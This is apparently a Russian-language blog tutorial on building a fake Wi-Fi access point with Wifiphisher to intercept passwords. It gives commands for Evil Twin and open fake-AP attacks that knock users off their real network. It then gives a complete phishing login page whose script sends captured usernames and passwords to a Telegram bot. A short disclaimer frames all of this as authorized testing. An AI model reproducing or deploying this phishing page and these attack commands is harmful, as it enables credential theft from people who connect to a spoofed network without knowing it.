взлом wi-fi

Создание поддельной Wi-Fi-сети для перехвата паролей

Мы же помним — закон наше все, и соблюдать законодательные требования можно и нужно. А значит — все, что ниже — это только для тестирования, и то — после разрешения владельца сети. Итак — поехали!

Каждый день появляются новые способы взлома Wi-Fi сетей, что заставляет владельцев уделять больше внимания защите. Один из инструментов, который позволяет проверить уязвимость вашей Wi-Fi сети — это Wifiphisher.

Wifiphisher — мощная библиотека с открытым исходным кодом, разработанная для тестирования защиты Wi-Fi сетей с помощью атак социальной инженерии. Давайте разберёмся, как работает этот инструмент, какие сценарии он поддерживает и как его можно использовать.

Основные возможности Wifiphisher

  • Создание фальшивых точек доступа (Fake AP):
    Wifiphisher может создавать поддельные Wi-Fi сети, имитирующие настоящие. Это помогает проверить, насколько пользователи склонны подключаться к ненадёжным сетям.
  • Атака Evil Twin:
    Инструмент отключает пользователей от их текущей Wi-Fi сети и перенаправляет их на поддельную точку доступа, где злоумышленник может собирать данные.
  • Фишинговые страницы:
    Wifiphisher предоставляет возможность настроить поддельные страницы входа, чтобы убедиться, что пользователи не вводят свои пароли на ненадёжных ресурсах.
  • Гибкость настройки:
    Библиотека поддерживает различные шаблоны атак и сценарии, которые можно настроить под конкретные нужды.
  • Как установить Wifiphisher

    Установка Wifiphisher довольно проста, но важно отметить, что инструмент работает только в Linux. Вот основные шаги:

  • Убедитесь, что на вашем устройстве установлен Python 3 и пакетный менеджер pip.
  • Склонируйте репозиторий Wifiphisher с GitHub:
    git clone https://github.com/wifiphisher/wifiphisher.git
  • Перейдите в папку проекта и установите зависимости:
    cd wifiphisher
    sudo python3 setup.py install
  • Запустите инструмент:
    sudo wifiphisher

    Примеры использования Wifiphisher
    Сценарий 1: Тестирование устойчивости сети к атаке Evil Twin

  • Запустите Wifiphisher с ключом для атаки Evil Twin:
    sudo wifiphisher --essid "MyHomeWiFi" --channel 6
  • Пользователи, подключенные к настоящей сети, будут отключены и перенаправлены на вашу поддельную точку доступа.
  • Настройте фишинговую страницу, чтобы убедиться, что пользователи не вводят свои данные на ненадёжных ресурсах. Например, для создания кастомной страницы входа используйте:
    sudo wifiphisher --phishing-page-name "credentials"
  • Сценарий 2: Создание открытой поддельной точки доступа

  • Запустите Wifiphisher в режиме Fake AP:
    sudo wifiphisher --essid "FreeWiFi" --channel 11
  • Посмотрите в режиме реального времени, сколько пользователей подключается к вашей поддельной точке доступа, наблюдая за логами:
    tail -f /var/log/wifiphisher.log
  • Нужен более детальный анализ полученных данных? Используйте встроенные плагины:
    sudo wifiphisher --plugin "plugin_name"
  • Сценарий 3: Перехват данных через фишинговую страницу
    В дополнение к встроенным шаблонам Wifiphisher вы можете создать свою кастомную страницу для перехвата паролей. Вот пример кода простой страницы авторизации, которая выводит форму авторизации, а после — отправляет полученные данные в Телеграм (как это делать (один из вариантов) — я писал здесь:

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wi-Fi Login</title>
    <style>
    body {
    font-family: Arial, sans-serif;
    text-align: center;
    margin-top: 50px;
    }
    .login-box {
    width: 300px;
    padding: 40px;
    border-radius: 10px;
    box-shadow: 0 0 15px rgba(0,0,0,0.2);
    background-color: #f1f1f1;
    margin: auto;
    }
    input[type="text"], input[type="password"] {
    width: 100%;
    padding: 10px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 5px;
    }
    button {
    width: 100%;
    padding: 10px;
    background-color: #4CAF50;
    color: white;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    }
    button:hover {
    background-color: #45a049;
    }
    </style>
    </head>
    <body>
    <div class="login-box">
    <h2>Wi-Fi Login</h2>
    <form id="loginForm">
    <input type="text" id="username" placeholder="Wi-Fi Username" required>
    <input type="password" id="password" placeholder="Wi-Fi Password" required>
    <button type="button" onclick="submitForm()">Submit</button>
    </form>
    </div>
    <script>
    function submitForm() {
    var username = document.getElementById('username').value;
    var password = document.getElementById('password').value;
    // Создаем сообщение для отправки в Telegram
    var message = "Получены данные:\nИмя пользователя: " + username + "\nПароль: " + password;
    // Отправка данных в Telegram через API
    var botToken = 'YOUR_BOT_TOKEN';  // Замените на свой токен
    var chatId = 'YOUR_CHAT_ID';      // Замените на свой chat_id
    var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
    // Отправляем данные с помощью XMLHttpRequest
    var xhr = new XMLHttpRequest();
    xhr.open('GET', url, true);
    xhr.send();
    // Уведомление, что данные отправлены
    alert('Ваши данные были отправлены!');
    }
    </script>
    </body>
    </html>
    

    И — краткое заключение:
    Важно понимать, что Wifiphisher предназначен только для этичного хакинга 🙂 Использовать его для тестирования чужих сетей без разрешения владельца — это нарушение закона. Инструмент создан, чтобы помочь специалистам по кибербезопасности выявлять слабые места в защите и предотвращать возможные атаки.

    Спасибо за внимание. Как всегда — в случае возникновения вопросов пишите на почту, или в Телеграм.

    Support the Blog!

    Running a blog takes a lot of effort, time, and passion. Your donations help improve the content, inspire new ideas, and keep the project going.
    If you’ve enjoyed the blog’s materials, any support would mean the world to me. Thank you for being here! ❤️

    PayPal Logo Donate via PayPal

    Revolut Logo Donate via Revolut

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *